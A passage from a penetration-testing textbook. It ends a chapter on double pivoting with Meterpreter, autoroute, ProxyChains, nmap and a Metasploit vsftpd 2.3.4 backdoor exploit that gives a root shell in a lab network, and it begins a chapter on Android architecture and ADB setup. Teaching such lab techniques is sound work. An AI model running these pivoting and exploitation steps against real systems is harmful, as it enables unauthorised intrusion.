IPv4 Netmask : 255.255.255.0 


Figure 9.28: Easy File Sharing exploit output_2 


Also, refer to Figure 9.29: 


Interface 3 
============ 
Name         : Intel(R) PRO/1000 MT Desktop Adapter #2 
Hardware MAC : 08:00:27:e3:47:43 
MTU          : 1500 
IPv4 Netmask : 255.255.255.0 


Figure 9.29: Easy File Sharing exploit output_3


The position the attacker has reached at this point is shown in Figure 9.30: 


Figure 9.30: Hidden network layout (attacker 172.16.0.20 with 172.16.0.15 and 172.16.0.16; RD with addresses 172.16.0.11 and 7.7.7.1 holding the Windows Meterpreter session; hidden network hosts 7.7.7.20 and 7.7.7.12)


We now have access to the 7.7.7.20 machine and need to do some more information gathering. 
Like the RD machine, the machine named JC has two NICs, and its second adapter reveals our 
second hidden network (8.8.8.0/24). Refer to Figure 9.31: 


meterpreter > ipconfig 

Name         : Intel(R) PRO/1000 MT Desktop Adapter 
Hardware MAC : 08:00:27:29:cd:cb 
MTU          : 1500 
IPv4 Address : 7.7.7.20 
IPv4 Netmask : 255.255.255.0 

Name         : Intel(R) PRO/1000 MT Desktop Adapter #2 
Hardware MAC : 08:00:27:e3:47:43 
MTU          : 1500 
IPv4 Netmask : 255.255.255.0 


Figure 9.31: Data gathering using ipconfig (the second adapter sits on 8.8.8.0/24)


Let us continue information gathering by running the ARP scanner on the second hidden network. 
Refer to Figure 9.32: 


meterpreter > run post/windows/gather/arp_scanner RHOSTS=8.8.8.0/24 
[*] Running module against SRV03 
[*] ARP Scanning 8.8.8.0/24 
(four hosts are listed with their MAC addresses; three of them carry the 08:00:27 prefix registered to CADMUS COMPUTER SYSTEMS, that is, VirtualBox adapters, and one is marked UNKNOWN) 


Figure 9.32: arp_scanner module 


The ARP scan finds four machines in this network, so we add a routing definition again, this 
time through the JC session. Refer to Figure 9.33: 


meterpreter > run autoroute -s 8.8.8.0/24 
[*] Adding a route to 8.8.8.0/255.255.255.0... 
[+] Added route to 8.8.8.0/255.255.255.0 
[*] Use the -p option to list all active routes 
msf > route print 


Figure 9.33: Autoroute command


Double pivoting 


The 8.8.8.0/24 network was discovered during information gathering on the JC system. Thanks 
to the first compromised system, we already have a routing rule between the 172.16.0.0/24 and 
7.7.7.0/24 networks. 


Network packets sent from 172.16.0.20 to the JC device (the second compromised machine) are 
first sent to the RD device (the first compromised machine), and RD then passes them on to JC. 


An attempt from the attacker computer (172.16.0.20) to reach 8.8.8.9 therefore goes through two 
stages: 
• RD: it does not know how to reach 8.8.8.9, but it knows the system (JC) that does, and 
forwards the traffic there. 
• JC: it knows how to forward packets from the 7.7.7.0/24 network to the 8.8.8.0/24 
network.


Figure 9.34 shows the final situation of the compromised and discovered systems: 


Figure 9.34: Final state of the compromised systems (attacker 172.16.0.20 with 172.16.0.15 and 172.16.0.16; RD holding the Windows Meterpreter session; 7.7.7.20 and 7.7.7.12 in the first hidden network; 8.8.8.9 and the other hosts found in 8.8.8.0/24 in the second)


Holy ProxyChains 


ProxyChains builds a chain of proxy servers and sends the connection through them from the 
first to the last. A new socks4 proxy server for the newly discovered 8.8.8.0/24 network is 
started on local port 1081. Refer to Figure 9.35:


Figure 9.35: Socks4a module 


The details of the new proxy server are added to the /etc/proxychains.conf configuration file. 
With the dynamic_chain option enabled, the defined proxy servers are used in the order listed, 
skipping any that are down. Refer to Figure 9.36:


Figure 9.36: proxychains.conf file 


The 8.8.8.9 target can now be scanned with nmap through ProxyChains, via the second pivot 
system. Refer to Figure 9.37:


root@kali:~# proxychains nmap -sT -sV -Pn -n -v -p 21,22,23,80 8.8.8.9 
ProxyChains-3.1 (http://proxychains.sf.net) 

Starting Nmap 7.25BETA1 ( https://nmap.org ) 
Nmap wishes you a merry Christmas! Specify -sX for Xmas Scan 
NSE: Loaded 36 scripts for scanning. 
Initiating Connect Scan 
|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK 
Discovered open port 80/tcp on 8.8.8.9 
(one |D-chain| line and one "Discovered open port" line per open port) 
Completed Connect Scan, 1.37s elapsed (4 total ports) 
Initiating Service scan 
Scanning 4 services on 8.8.8.9 
(one |D-chain| line per service probe) 
Completed Service scan at 05:54 


Figure 9.37: Nmap output_1


Also, refer to Figure 9.38: 


NSE: Script scanning 8.8.8.9. 
NSE: Starting runlevel 1 (of 2) scan. 
Initiating NSE at 05:54 
|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK 
|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK 
Completed NSE at 05:54, 1.71s elapsed 
NSE: Starting runlevel 2 (of 2) scan. 
Initiating NSE at 05:54 
Completed NSE at 05:54, 0.00s elapsed 
Nmap scan report for 8.8.8.9 
Host is up, received user-set (0.41s latency). 
PORT   STATE SERVICE REASON  VERSION 
21/tcp open  ftp     syn-ack vsftpd 2.3.4 
22/tcp open  ssh     syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 
23/tcp open  telnet  syn-ack Linux telnetd 
80/tcp open  http    syn-ack Apache httpd 2.2.8 ((Ubuntu) DAV/2) 
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 
Read data files from: /usr/bin/../share/nmap 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 14.59 seconds 
root@kali:~# 


Figure 9.38: Nmap output_2


As you can see, the packets first pass through the first proxy server and then through the 
second one we set up before arriving at the final destination. Analysis of the scan results shows 
that the vsftpd 2.3.4 service at 8.8.8.9 is vulnerable: that release carries a known backdoor.
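The single socks4 proxy used for the 7.7.7.20 scan and the dynamic chain through ports 1080 and 1081 used here both come down to the same wire format, so here is one added Python example (written for this edit; it is not part of the chapter, of ProxyChains or of Metasploit) that builds and parses SOCKS4 CONNECT messages and lays out the requests a proxy chain issues: each proxy is asked to CONNECT to the next proxy, and the last one is asked to CONNECT to the real target. Hostnames use the SOCKS4a extension, which is what Metasploit's socks4a module speaks. The proxy and target addresses are the ones from the chapter; the example only constructs and decodes bytes and never touches the network.

```python
import ipaddress
import struct

SOCKS_VERSION = 4
CMD_CONNECT = 1
REPLY_GRANTED = 0x5A    # request granted
REPLY_REJECTED = 0x5B   # request rejected or failed


def connect_request(host, port, userid=b""):
    """Build a SOCKS4 CONNECT: VN=4, CD=1, DSTPORT, DSTIP, USERID, NUL.
    For a hostname use the SOCKS4a form: DSTIP=0.0.0.1 and the name after the NUL."""
    try:
        ip = ipaddress.IPv4Address(host)
        hostname = b""
    except ipaddress.AddressValueError:
        ip = ipaddress.IPv4Address("0.0.0.1")
        hostname = host.encode("ascii") + b"\x00"
    header = struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, port, ip.packed)
    return header + userid + b"\x00" + hostname


def parse_reply(data):
    """Parse the 8-byte SOCKS4 reply (VN=0, CD, DSTPORT, DSTIP).
    Returns (granted, port, ip); raises ValueError on a malformed reply."""
    if len(data) < 8:
        raise ValueError("short SOCKS4 reply")
    vn, cd, port, raw_ip = struct.unpack("!BBH4s", data[:8])
    if vn != 0:
        raise ValueError("unexpected reply version %d" % vn)
    return cd == REPLY_GRANTED, port, str(ipaddress.IPv4Address(raw_ip))


def chain_requests(proxies, target):
    """Requests a proxychains-style chain issues, in order: the first goes to
    proxies[0] over a fresh TCP connection; each later one is written into the
    stream the previous proxy has just opened. Returns [(proxy, request_bytes), ...]."""
    if not proxies:
        raise ValueError("need at least one proxy")
    hops = list(proxies[1:]) + [target]
    return [(proxy, connect_request(*hop)) for proxy, hop in zip(proxies, hops)]


if __name__ == "__main__":
    # Single pivot from the chapter: nmap via socks4 on 172.16.0.20:1080 to 7.7.7.20:445.
    print(connect_request("7.7.7.20", 445).hex())
    # Double pivot: dynamic_chain through 1080 and 1081 to 8.8.8.9:80.
    for proxy, req in chain_requests([("172.16.0.20", 1080), ("172.16.0.20", 1081)],
                                     ("8.8.8.9", 80)):
        print(proxy, req.hex())
    print(parse_reply(b"\x00\x5a\x00\x00\x00\x00\x00\x00"))
```

Reading the |D-chain| lines in the nmap output with this in mind, 172.16.0.20:1080 receives a CONNECT for 172.16.0.20:1081, and only the second proxy receives the CONNECT for 8.8.8.9, which it can satisfy because Metasploit routes 8.8.8.0/24 through the JC session.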


The following steps prepare the vsftpd exploit module in the Metasploit framework and 
compromise our final target. Refer to Figure 9.39:


msf > use exploit/unix/ftp/vsftpd_234_backdoor 
msf exploit(vsftpd_234_backdoor) > show options 

Module options (exploit/unix/ftp/vsftpd_234_backdoor): 

   Name   Current Setting  Required  Description 
   ----   ---------------  --------  ----------- 
   RHOST                   yes       The target address 
   RPORT  21               yes       The target port 

Exploit target: 

   Id  Name 
   --  ---- 
   0   Automatic 

msf exploit(vsftpd_234_backdoor) > set rhost 8.8.8.9 
rhost => 8.8.8.9 


Figure 9.39: vsftpd exploit output_1


Also, refer to Figure 9.40: 


msf exploit(vsftpd_234_backdoor) > run 

[*] 8.8.8.9:21 - Banner: 220 (vsFTPd 2.3.4) 
[*] 8.8.8.9:21 - USER: 331 Please specify the password. 
[+] 8.8.8.9:21 - Backdoor service has been spawned, handling... 
[+] 8.8.8.9:21 - UID: uid=0(root) gid=0(root) 
[*] Found shell. 
[*] Command shell session 4 opened (Local Pipe -> Remote Pipe) 

id 
uid=0(root) gid=0(root) 

ifconfig 
eth0      Link encap:Ethernet  HWaddr 08:00:27:56:f1:7c 
          inet addr:8.8.8.9  Bcast:8.8.8.255  Mask:255.255.255.0 
          inet6 addr: fe80::a00:27ff:fe56:f17c/64 Scope:Link 
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1 
          RX packets:10843 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:2779 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:1000 
          RX bytes:1081842 (1.0 MB)  TX bytes:661455 (645.9 KB) 
          Base address:0xd010 Memory:f0000000-f0020000 

lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Mask:255.0.0.0 
          inet6 addr: ::1/128 Scope:Host 
          UP LOOPBACK RUNNING  MTU:16436  Metric:1 
          RX packets:18161 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:18161 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:0 
          RX bytes:5307479 (5.0 MB)  TX bytes:5307479 (5.0 MB) 


Figure 9.40: vsftpd exploit output_2


Mitigations 


A few mitigations are as follows: 


• Multi-homed systems that bridge the user network and the DMZ should be removed from the 
network topology; a host with a NIC in each network is exactly the pivot this chapter relies on. 


• Systems in the DMZ should only be reached through the DMZ's own access structures (a 
firewall rule set that permits the required services in one direction), never through a 
workstation that happens to sit on both networks. 


• Keep the services behind the pivot patched: MS08-067 on JC and the backdoored vsftpd 2.3.4 
on SK were the footholds once the hidden networks became reachable.


Conclusion 


The attacker discovered two different hidden networks by following these steps: 


1. The attacker gained access to the RD machine on the same network as the attacker. 
2. He then noticed that the RD machine has two network interfaces. 
3. Using the autoroute post module, he created a routing rule. 
4. The attacker then ran ARP and nmap scans on the 7.7.7.0/24 network and discovered a 
machine named JC. 
5. JC had two different vulnerabilities: Easy File Sharing and MS08-067. 
6. After successfully exploiting MS08-067, the attacker gained access to the 7.7.7.20 
machine. 
7. Information gathering showed that JC also has two network interfaces. 
8. Another routing rule was defined through 7.7.7.20. 
9. ARP and nmap scans were run on 8.8.8.0/24. 
10. A vulnerable vsftpd was running on the machine SK at 8.8.8.9.


Refer to Figure 9.41: 


Figure 9.41: Final layout for hidden network (attacker 172.16.0.20 with 172.16.0.15 and 172.16.0.16; RD with 172.16.0.11 and 7.7.7.1; JC at 7.7.7.20; SK at 8.8.8.9 running vsftpd 2.3.4)


While the attacker's machine could initially reach only the network it was connected to, the 
attacks gave it access to the two hidden networks as well.


Questions


1. What is routing? 
2. What is pivoting? 
3. What is port forwarding? 


CHAPTER 10 
Android Penetration Testing 


Introduction 


Smartphones have grown ubiquitous, with over 1 billion users globally and 2.5 million apps (and 
counting) available on the Google and Apple digital marketplaces. Their impact on our lives is 
immediate and profound, affecting our daily lives in various ways, including how we connect, 
work, and socialize. The rise in consumer demand, as well as the processing power and 
capabilities of smartphones, such as storage, GPS, camera, screens, and other features, has 
shifted the paradigm of mobile application development. Online banking, trading, e-mails, 
airport check-ins, and much more are all available with a single tap. 


In this chapter, we will cover all the information we will need to begin hacking and penetration 
testing Android apps. The top 10 OWASP mobile application vulnerabilities will be discussed, 
as well as how to attack Android apps and their weaknesses, with examples. 


Structure 


The following topics will be covered in this chapter: 


• Android architecture 
• Android penetration testing environment setup 
• Android penetration testing tools 
• Secure Android applications


Objectives 


In this chapter, you will learn the Android architecture in detail, learn how to set up an 
Android penetration testing environment and get to know the popular Android penetration testing 
tools. Finally, you will learn how to protect your Android applications.


Android architecture 


Understanding the architecture of any platform is critical for any developer or security 
researcher. Android is built on the Linux kernel (the 2.6 and 3.x series in the releases 
discussed here). 


The platform consists of the following: 
• Key applications 
• Operating system 
• Middleware 
• Runtime environment 
• Various services 
• Native and custom libraries 

As indicated in Figure 10.1, it can be represented as five layers:


Figure 10.1: Android architecture (five layers: Applications; Application Framework with its managers; Libraries; Android Runtime with its core libraries; Linux Kernel with the hardware drivers, such as flash memory)
All of the components have been fine-tuned and merged to give the best possible environment 
for developing and executing mobile applications. 


Let us take a bottom-up approach to learn about the various layers of the Android stack now. 


The Linux kernel 


The Linux kernel is at the core of the Android operating system. Linux was picked as the best 
contender to start with because of its flexible portability features, which allow for easy 
compilation of applications on a variety of hardware platforms. 


Process management and scheduling, memory management, and device management are all 
provided by the Linux kernel, which sits at the bottom of the software stack. It also serves 
as a key abstraction layer, allowing apps to communicate with physical devices through the 
many device drivers it provides.


The automatic rotation of the screen to match the orientation of the mobile device is a simple 
example of this. The following questions arise: 

• How does this happen? 
• What triggers the device to perform this operation? 
• How does the OS come to know that the device orientation has changed?


Let us take a closer look. 


The accelerometer and gyroscope are hardware sensors in the device that detect minute motions 
and changes in orientation and communicate this data to the kernel. This information is 
converted into software instructions by the device drivers, which are picked up by the apps; if the 
app is intended to respond to these instructions, it does so. The Linux kernel, as illustrated in the 
diagram as shown in Figure 10.2, contains all of the drivers needed for the hardware to function 
properly, as well as power management. 


In a nutshell, the Linux kernel is in charge of memory, resources, power, and driver 
management. 


Figure 10.2: Linux kernel


Confusion between Linux and the Linux kernel 


The name Linux is commonly used to refer to the complete operating system, whereas the kernel 
is the operating system's core. The fact that Android is based on the Linux kernel does not 
make it another Linux distribution; it only means that the Linux kernel is the foundation, and 
not every Linux program can be loaded on Android.


Android runtime 


Although Android applications are written in Java, the runtime layer of the Android 
architecture consists of the Dalvik Virtual Machine (DVM), the core Java libraries and, from 
Android 4.4 onwards, a new virtual machine called Android Runtime (ART). 


Figure 10.3 is from Android 4.4 KitKat, where ART could be enabled as an experimental runtime 
from the developer options: 
Figure 10.3: Android runtime (ART) option


Apps written in Java are executed on the DVM. For licensing reasons the DVM does not claim to 
be a Java virtual machine (JVM), although it serves the same purpose; it is designed to run on 
low-power, low-memory devices. For performance reasons the DVM is started only once: a system 
service called Zygote then forks a copy of that already-initialized process for each new 
application. The structure of the Android runtime is shown in Figure 10.4: 


Figure 10.4: Android runtime core libraries (Dalvik Virtual Machine and the core libraries)


When we build a Java application, we get bytecode. This bytecode is executed by the JVM, a 
virtual machine, that is, a program that behaves like a dedicated machine for that bytecode. 
Figure 10.5 depicts the compilation of a Java program: 


Java source code (.java) -> Java compiler -> Java bytecode (.class) 


Figure 10.5: Java program compilation process


The Dalvik virtual machine 


In Android, the bytecode produced by the Java compiler is not run directly: the DEX compiler 
(the dx tool) converts the .class files into a single, more compact file in the Dalvik 
executable format (.dex), which the DVM then runs. 


Why is it necessary to convert Java bytecode to .dex format? 


Mobile devices do not have the processing power, memory and RAM of a PC, so applications need 
to be lighter. On PCs, Java bytecode is fine for heavyweight applications. The DEX format 
removes redundancy from the compiled classes: the per-class constant pools are merged and each 
string, type and method descriptor is stored only once. For example, if your Java source code 
has 1,000 classes, all 1,000 end up in a single file in the Dalvik executable format (.dex).


The conversion of Java source code (.java) to Dalvik bytecode (.dex) is depicted in the 
flowchart in Figure 10.6: 


Java source code (.java) -> Java compiler -> Java bytecode (.class) -> DEX compiler -> Dalvik bytecode (.dex) 


Figure 10.6: Conversion of .java to .dex
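As an added example (written for this edit; not from the chapter), the following Python parses the fixed 0x70-byte header that every .dex file starts with and checks the two integrity fields it carries: an Adler-32 checksum over everything after the checksum field, and a SHA-1 signature over everything after the signature field. These are the first things to verify when a .dex pulled out of an APK looks tampered with. build_minimal_dex() constructs a header-only file with no classes, purely so the parser has something valid to run on; it is not a real application.

```python
import hashlib
import struct
import zlib

HEADER_SIZE = 0x70
ENDIAN_CONSTANT = 0x12345678
# The 20 little-endian uint32 fields that follow magic, checksum and signature.
UINT_FIELDS = (
    "file_size", "header_size", "endian_tag", "link_size", "link_off", "map_off",
    "string_ids_size", "string_ids_off", "type_ids_size", "type_ids_off",
    "proto_ids_size", "proto_ids_off", "field_ids_size", "field_ids_off",
    "method_ids_size", "method_ids_off", "class_defs_size", "class_defs_off",
    "data_size", "data_off",
)
HEADER_FMT = "<8sI20s" + "I" * len(UINT_FIELDS)   # 8 + 4 + 20 + 80 = 0x70 bytes


def parse_dex_header(blob):
    """Return the header fields plus checksum_ok, signature_ok and layout_ok flags."""
    if len(blob) < HEADER_SIZE:
        raise ValueError("file shorter than a dex header")
    magic, checksum, signature, *values = struct.unpack_from(HEADER_FMT, blob, 0)
    if magic[:4] != b"dex\n" or magic[7:8] != b"\x00":
        raise ValueError("bad dex magic %r" % magic)
    hdr = dict(zip(UINT_FIELDS, values))
    hdr["version"] = magic[4:7].decode("ascii")
    # Adler-32 covers offset 12 to EOF (everything after the checksum itself).
    hdr["checksum_ok"] = (zlib.adler32(blob[12:]) & 0xFFFFFFFF) == checksum
    # SHA-1 covers offset 32 to EOF (everything after the signature itself).
    hdr["signature_ok"] = hashlib.sha1(blob[32:]).digest() == signature
    hdr["layout_ok"] = (hdr["file_size"] == len(blob)
                        and hdr["header_size"] == HEADER_SIZE
                        and hdr["endian_tag"] == ENDIAN_CONSTANT)
    return hdr


def build_minimal_dex(version=b"035"):
    """Constructed header-only .dex with a correct checksum and signature (illustration only)."""
    values = [HEADER_SIZE, HEADER_SIZE, ENDIAN_CONSTANT] + [0] * (len(UINT_FIELDS) - 3)
    body = struct.pack("<" + "I" * len(UINT_FIELDS), *values)
    signature = hashlib.sha1(body).digest()
    checksum = zlib.adler32(signature + body) & 0xFFFFFFFF
    return b"dex\n" + version + b"\x00" + struct.pack("<I", checksum) + signature + body


def tampered(blob, offset=HEADER_SIZE - 1):
    """Flip one bit inside the signed region to show that both integrity checks fail."""
    out = bytearray(blob)
    out[offset] ^= 0x01
    return bytes(out)


if __name__ == "__main__":
    good = parse_dex_header(build_minimal_dex())
    bad = parse_dex_header(tampered(build_minimal_dex()))
    print("version", good["version"], "class_defs", good["class_defs_size"])
    print("clean:   ", good["checksum_ok"], good["signature_ok"], good["layout_ok"])
    print("tampered:", bad["checksum_ok"], bad["signature_ok"], bad["layout_ok"])
```

Note that neither field is a security control on its own: anyone who modifies a .dex can recompute both, so on a device the real protection is the APK signature that wraps the file. The checks are still useful in analysis, because a mismatch tells you the file was altered after it left the build tools.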


Zygote 
The zygote is one of the first programs that starts when an Android device boots, and it is 
responsible for the following: 

• Starting up a virtual machine 
• Preloading the core libraries 
• Initializing various shared structures


Core Java libraries 
These are distinct from the Java SE and Java ME core libraries and are commonly called the 
Dalvik libraries. They include: 
• DVM-specific libraries: these are designed to communicate directly with a DVM instance and 
are unlikely to be used by the development community. 
• Java interoperability libraries: a collection of classes from the core Java runtime 
libraries; they typically assist with file operations, string manipulation and networking 
tasks.


ART 


The DVM was fully replaced by ART when Google released Android 5.0 Lollipop. ART has several 
advantages over the DVM, which include the following: 


• Ahead-of-time (AOT) compilation at install time instead of just-in-time (JIT) compilation at 
run time 
• Improved garbage collection 
• Better application performance 


The process of compiling ART code is depicted in Figure 10.7: 


Figure 10.7: Comparison between Dalvik and ART compilation (Dalvik: .dex interpreted and JIT-compiled while the app runs; ART: .dex compiled to native code ahead of time at install)


Native libraries 


Some low-level components cannot be interacted with when developing in Java. If you need to 
display graphics on the device screen, for example, you will not be able to write code directly in 
Java; instead, you will need to write a function or method that calls other native programs that 
are not Java programs. 


The native libraries in Android are non-Java programs. The libraries are written in various 
languages, including C, C++, and others. The Android Native Development Kit (NDK), which 
contains a wide range of libraries and headers that allow developers to create and build various 
activities, is used to install this native code. 


Figure 10.8 depicts the many native libraries that are currently available on the Android 
platform: 

Figure 10.8: Native libraries 


It can be customized by any Original Equipment Manufacturer (OEM). The libraries module 
usually contains the following items: 

• The media framework: This framework is built on the PacketVideo OpenCore platform 
and supports common audio, video, and still-frame formats as well as codec plugins. The 
Stagefright vulnerability was a flaw in this media framework (libstagefright) that gave 
attackers full remote access through a feature that automatically played video files 
received via MMS or other means on an Android device. 
• The surface manager: This supports the display subsystem and composes the 2D and 3D 
graphics layers of many applications. 
• FreeType: This is used to render bitmaps and text. 
• OpenGL ES: OpenGL is a cross-platform graphics API that defines a software interface 
for 3D graphics processors. 
• Secure Socket Layer (SSL): This is based on OpenSSL (www.openssl.org). 
• SQLite: The application framework API makes this lightweight relational database 
engine available to any application. 
• WebKit: This is a browser engine based on the WebKit browser (www.webkit.org), 
which supports page rendering, full CSS, JavaScript, DOM, and AJAX, as well as 
single-column and adaptive view rendering. 
• SGL (short for Scalable Graphics Library): This is the 2D graphics library. 
• libc: Standard C system libraries derived from BSD for embedded Linux-based devices. 


The application framework 


The application framework gives developers the tools they need to create far more complicated 
apps or tools. This framework is used to manage the application’s full development lifecycle. 


A developer who is developing an app that requires the notification feature, for example, does 
not need to write a single line of code; instead, he or she may just call the Notification Manager 
API. Most of the APIs required to operate an Android smartphone are provided by this 
framework. 


A list of the frameworks that are now available for the Android platform is shown in Figure 
10.9: 

Figure 10.9: Application framework 


The key services in this framework are as follows: 

• Activity manager: The Activity Manager manages an app's full lifetime and is also 
responsible for handling the many states of an activity so that apps running in different 
processes operate smoothly; we will go over this in depth in the next section. 
• Content providers: This component enables applications to share and publish data with 
other apps. The content provider is responsible for encapsulating data, defining data 
security, and controlling the data structure. An example is an app that keeps all of a 
user's input structured in an SQLite database. 
• Resource manager: The Resource Manager manages access to all embedded resources 
that are not coded in the app, such as graphics, localized strings, and layout files. 
• Notification manager: This provides mobile user notifications and displays alerts. 
• View system: The View System manages the many views, event dispatching, and 
important widgets such as buttons and lists. 
• Package manager: This controls all the application packages that are installed on the 
device. 
• Telephony manager: This provides telephone services, such as status and subscriber 
information, to the device. 
• Location manager: This provides location services and notifies an app of changes in 
location so that it can receive updates. 
• Window manager: This organizes the screen that is shown to the user and provides the 
surface on which an application is drawn and layered appropriately on the display 
window. 


The applications layer 


This is the first layer of the Android stack, and it is through applications that the bulk of 
consumers interact with their phones. As shown in Figure 10.10, there are two types of 
applications that are generally available on the device: 


[Figure 10.10: the applications layer, split into native Android apps and third-party apps] 

Figure 10.10: Applications layer 


Now, let us explore the differences. 


Native Android or system apps 


System apps are applications that are placed on the phone by the manufacturer and provided with 
it. The e-mail client, SMS program, phone, calendar, maps, phone dialer, browser, contacts, and 
other applications are all loaded by default. These apps are usually not able to be removed from 
the device and reside in the /system folder. 


User-installed or custom apps 


The user can download and install these applications through a variety of distribution networks, 
including Google Play and Amazon Store. These apps are in the Android filesystem’s 
/data/data/ subdirectory. In the next sections, we will go over the specifics of the security 
features. 


Android penetration testing environment setup 


For any form of a security evaluation, establishing a well-structured test environment is critical. 
It is recommended that you start with a zero environment, presuming that nothing is installed on 
your PC. The hardware and software requirements for establishing a basic infrastructure for 
Android Application Penetration Testing are listed as follows. 


This book concentrates on setting up the environment on Windows, but you are free to 
experiment with Linux and other operating systems as well. 


• Hardware and OS requirements: 
  o A workstation/laptop running Windows 7 (64-bit) 
• Mobile devices and OS requirements: 
  o Google Nexus 5 or any other device running Android 5.0 or higher (rooted) 
• Software requirements: 
  o Python 
  o Java Development Kit (1.8) 
• Other requirements: 
  o Compatible USB cables for mobile devices 
  o Network Wi-Fi devices (any smartphone with a tethering facility can act as a 
Wi-Fi router) 


Why do you need a rooted phone for your test environment? 


It is as basic as being able to edit and install any tools on the device and run unsigned software 
from atypical app stores. Rooted phones have complete filesystem access. Rooting a mobile 
device is outside the scope of this book. 


Android Studio and SDK 


The official Integrated Development Environment (IDE) for developing Android apps is 
Android Studio, which Google supports. Kotlin replaced Java as the preferred language for 
developing Android apps on May 7, 2019, but Java is still widely used for Android 
development. Android Studio Dolphin | 2021.3.1 has the following features: 

• Gradle-based build support. 
• UI components can be created by drag and drop in the layout editor. 
• Common Android designs and components can be created by template-based wizards. 
• Built-in support for Google Cloud Platform, enabling integration with Firebase Cloud 
Messaging (earlier Google Cloud Messaging) and Google App Engine. 
• Lint tools to catch performance, usability, version compatibility, and other problems. 
• Multi-preview API. 
• Wear OS pairing assistant. 


The following prerequisites must be met before downloading and installing Android Studio. 


• Operating system version: Microsoft Windows 8/10 (64-bit). 
• CPU architecture: x86_64, 2nd generation Intel Core or later, or an AMD CPU with 
support for Windows. 
• Random Access Memory (RAM): minimum 8 GB. 
• Free disk space: minimum 8 GB for IDE + Android SDK + Android Emulator. 
• Minimum required JDK version: Java Development Kit (JDK) 8. 
• Minimum screen resolution: 1280 x 800. 


Downloading and installation of Android Studio 


To download and install Android Studio, follow the given steps: 


1. To download Android Studio, visit the official Android Studio website 
(https://developer.android.com/studio/) in your Web browser. 


2. Click on the Download Android Studio option, as shown in Figure 10.11: 

Figure 10.11: Download Android Studio from website 


3. After downloading, double-click on the Android Studio-ide.exe file. 


4. Android Studio Setup will appear on the screen, and click Next to proceed, as shown in 
Figure 10.12: 


[Figure 10.12 screenshot: Android Studio Setup welcome page ("Setup will guide you through the installation of Android Studio ... Click Next to continue")] 

Figure 10.12: Android Studio Setup_1 


5. Select the components that you want to install and click on the Next button, as shown in 
Figure 10.13: 


[Figure 10.13 screenshot: Choose Components page, with Android Studio and Android Virtual Device selected; space required 2.3 GB] 

Figure 10.13: Android Studio Setup_2 


6. Now, browse the location where you want to install the Android Studio and click Next to 
proceed, as shown in Figure 10.14: 


[Figure 10.14 screenshot: Configuration Settings / Install Locations page; the location must have at least 500 MB of free space; installation location F:\Android Studio] 

Figure 10.14: Android Studio Setup_3 


7. Choose a start menu folder for the Android Studio shortcut and click the Install button 
to proceed, as shown in Figure 10.15: 


[Figure 10.15 screenshot: Choose Start Menu Folder page, with the "Do not create shortcuts" checkbox] 

Figure 10.15: Android Studio Setup_4 


8. After the successful completion of the installation, click on the Next button, as shown in 
Figure 10.16: 


[Figure 10.16 screenshot: Installation Complete page ("Setup was completed successfully")] 

Figure 10.16: Android Studio Setup_5 


9. Click on the Finish button to proceed, as shown in Figure 10.17: 


[Figure 10.17 screenshot: Completing Android Studio Setup page, with the "Start Android Studio" checkbox] 

Figure 10.17: Android Studio Setup_6 


10. Now, your Android studio welcome screen will appear on the screen, as shown in Figure 
10.18: 


[Figure 10.18 screenshot: Android Studio welcome screen] 

Figure 10.18: Android Studio Setup_7 


The Android SDK 


The Android SDK allows developers to create, test, and debug apps for the Android platform. It 
includes all the necessary software libraries, APIs, emulator system images, documentation, and 
other resources for developing Android apps. We have installed Android Studio along with the 
Android SDK, and it is critical to grasp how to make the most of the SDK's built-in features. 
This section gives an overview of some of the key tools we will use to attack an Android app as 
part of the penetration testing exercise. 


The Android Debug Bridge 


This is what we talked about in this chapter's Android Architecture section. It is a 
straightforward and powerful command-line tool that will be used to interface with and operate 
Android devices. USB debugging must be enabled on a physical device before ADB can 
connect to it. You can access this on the Galaxy Note 10 with Android v9 by going to Settings | 
Developer settings, as demonstrated in Figure 10.19. 


If the Developer options are not visible, it is because they are disabled; you may enable them by 
tapping the Build number field, which can be found by going to Settings | About Phone | 
Software information | Build number. You should tap seven times in total. 


Refer to Figure 10.19: 

Figure 10.19: Android debug bridge 


The following is a collection of ADB commands that will be used during the testing process. 


Connecting to the device 


Once the device is connected to the workstation, use the ADB devices command to see if the 
device is correctly set up with the correct device drivers. This command displays a list of all 
connected devices to your workstation. Refer to Figure 10.20: 


c:\>adb devices 
List of devices attached 
0072c52ca20e47cf    device 


Figure 10.20: ADB devices command_1 


When you run this command without the device drivers for the mobile device loaded, you will 
get a blank list, as shown in Figure 10.21: 


c:\>adb devices 
List of devices attached 


Figure 10.21: ADB devices command_2 


In this instance, you may need to download and install device drivers from the device 
manufacturers’ websites. 


Getting access to the device 


Android is based on the Linux kernel, as detailed in this chapter's Android Architecture section. 
You may use ADB to connect to a shell and run commands on your mobile device. Once the 
Allow USB debugging prompt has been accepted on the device, the ADB shell command can be 
used on a rooted or unrooted device, as demonstrated in the command-line output that follows. 
You will get a standard shell with some limitations. On a rooted device, you can enter root mode 
by typing su, which allows you to run most Linux commands. Refer to Figure 10.22: 


c:\>adb shell 
shell@mako:/ $ ls 
acct 
cache 
charger 
config 
shell@mako:/ $ su 
root@mako:/ # ls 
acct 
cache 
charger 


Figure 10.22: ADB shell command 


If the workstation is connected to more than one device, you need to tell ADB which device to 
use with one of the following parameters. Refer to Figure 10.23: 


c:\>adb devices 
List of devices attached 
192.168.56.101:5555    device 
0072c52ca20e47cf    device 
c:\>adb -s 0072c52ca20e47cf shell 
shell@mako:/ $ su 


Figure 10.23: ADB devices and shell commands 


• -s <serial> to connect to the device with the given serial number 
• -d to connect only to the USB device 
• -e to connect only to an emulator 
